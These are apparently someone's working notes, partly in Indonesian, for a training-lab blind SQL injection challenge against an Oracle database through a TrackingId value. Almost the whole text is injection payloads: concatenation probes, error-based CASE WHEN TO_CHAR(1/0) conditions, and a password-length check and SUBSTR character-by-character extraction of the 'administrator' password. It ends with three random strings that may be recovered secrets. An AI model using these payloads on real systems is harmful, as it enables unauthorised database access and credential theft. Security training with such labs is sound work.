'
''
'|| (SELECT '')||'
'|| (SELECT '' FROM dual)||'
'|| (SELECT '' FROM users WHERE ROWNUM = 1)||'
'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
'|| (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
'|| (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
length = 20

'|| (SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||

gampangnya SELECT username FROM users WHERE TrackingId=blablabla (lalu diteruskan dengan syntax sqli)

AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE 'a' END FROM dual) ='a'--
' AND (SELECT CASE WHEN LENGTH(password) > 1 THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator') ='a'--
' AND (SELECT CASE WHEN SUBSTR(password, 1, 1) = 'a' THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator') ='a'--

rr07nb87aqjz9aa9et46o
gpojsuy718z3faetoy3i
ffnm09ka0u0qvlsfvm0vq
